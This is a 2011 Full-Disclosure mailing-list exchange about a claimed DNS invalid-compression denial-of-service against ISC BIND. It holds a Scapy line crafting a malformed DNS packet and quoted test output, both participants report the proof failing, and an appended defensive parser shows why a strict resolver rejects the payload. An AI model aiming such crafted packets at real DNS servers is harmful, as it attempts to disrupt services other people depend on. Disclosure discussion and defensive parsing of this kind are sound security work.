Message-ID: <CAGoLFzN+iRUGPQ6Yr-bN_Un5wfVM951hq16FDOS65rX-GbHf+A@mail.gmail.com>
Date: Thu, 14 Jul 2011 12:27:19 +0200
From: Francisco J. Gómez Rodríguez <ffranz@...qua.com>
To: Kai <kai@...nn.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Semi 0day DNS Invalid Compression attack

The proof doesn't work on my own ISC BIND 9.7.3 either. :-(

By the way, you can use Scapy to create the packet:

# RandShort() rather than RandInt(): the UDP source port is a 16-bit field
a=IP(dst="127.0.0.1")/UDP(sport=RandShort(),chksum=0)/Raw(
load='\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00')

regards...

On Mon, Jul 11, 2011 at 3:31 PM, Kai <kai@...nn.net> wrote:

>  Hi,
>
>  tested on isc bind 9.7.3, on opensuse 11.4.
>  sent a few packets to myself:
>
>  --> [1000000]: (127.0.0.1)->(127.0.0.1)
>  --> Done.
>
>  and named felt beautiful along the test:
>
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
>  2844 named     20   0  111m  22m 2456 S    0  0.2   0:00.09 named
>
>  named -V:
>
>  BIND 9.7.3 built with '--prefix=/usr' '--bindir=/usr/bin'
>  '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--localstatedir=/var'
>  '--libdir=/usr/lib' '--includedir=/usr/include/bind'
>  '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--with-openssl'
>  '--enable-threads' '--with-libtool' '--enable-runidn' '--with-libxml2'
>  '--with-dlz-mysql' '--with-dlz-ldap' '--with-gssapi'
>  'CFLAGS=-fomit-frame-pointer -fmessage-length=0 -O2 -Wall
>  -D_FORTIFY_SOURCE=2 -fstack-protector -funwind-tables
>  -fasynchronous-unwind-tables -g -fno-strict-aliasing'
>  'LDFLAGS=-L/usr/lib'
>
>  you said that packet was like
> > # 4500 002b 512f 4000 3411 92a9 2989 601e
>
>  so i've changed packet header to
>  "\x45\x00\x00\x2b\x51\x2f\x40\x00\x34\x11\x92\xa9" and length to
>  "\x00\x4a" (74, right?) but still no luck. Any thoughts?
>
>
> --
>  Cheers,
>
>  Kai
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
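
How a strict DNS parser reads the Raw payload from the Scapy line in the message above, as an added example that is not part of the original thread. It assumes the payload is handled as a DNS message per RFC 1035; the function names are illustrative, and it generalizes slightly by also validating compression pointers.

```python
import struct

# Payload copied from the Scapy line in the message: the same 18 bytes, three times.
PAYLOAD = (b"0123456789ABCDE" + b"\x00\x00\x00") * 3

def parse_header(msg):
    """Return the six 16-bit fields of the DNS header (RFC 1035, section 4.1.1)."""
    if len(msg) < 12:
        raise ValueError("shorter than a DNS header")
    names = ("id", "flags", "qdcount", "ancount", "nscount", "arcount")
    return dict(zip(names, struct.unpack("!6H", msg[:12])))

def walk_name(msg, off, max_jumps=16):
    """Walk one domain name starting at off, checking every length/pointer byte.

    Returns (labels, error); error is None when the name is well formed.
    """
    labels, jumps = [], 0
    while True:
        if off >= len(msg):
            return labels, "name runs past end of message"
        b = msg[off]
        if b == 0:                      # root label terminates the name
            return labels, None
        kind = b & 0xC0
        if kind == 0x00:                # ordinary label, length in low 6 bits
            if off + 1 + b > len(msg):
                return labels, "label at offset %d overruns message" % off
            labels.append(msg[off + 1:off + 1 + b])
            off += 1 + b
        elif kind == 0xC0:              # compression pointer (two bytes)
            if off + 1 >= len(msg):
                return labels, "truncated pointer at offset %d" % off
            target = ((b & 0x3F) << 8) | msg[off + 1]
            if target >= off:           # must refer to earlier data
                return labels, "pointer at offset %d does not point backwards" % off
            jumps += 1
            if jumps > max_jumps:       # bound the work done on pointer chains
                return labels, "too many compression pointers"
            off = target
        else:                           # top bits 01 or 10 are not valid here
            return labels, "reserved label type 0x%02x at offset %d" % (b, off)

if __name__ == "__main__":
    print(parse_header(PAYLOAD))
    print(walk_name(PAYLOAD, 12))
```

For the payload above, `walk_name(PAYLOAD, 12)` stops at the first name byte, 0x43, whose top two bits are neither 00 (label) nor 11 (pointer).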
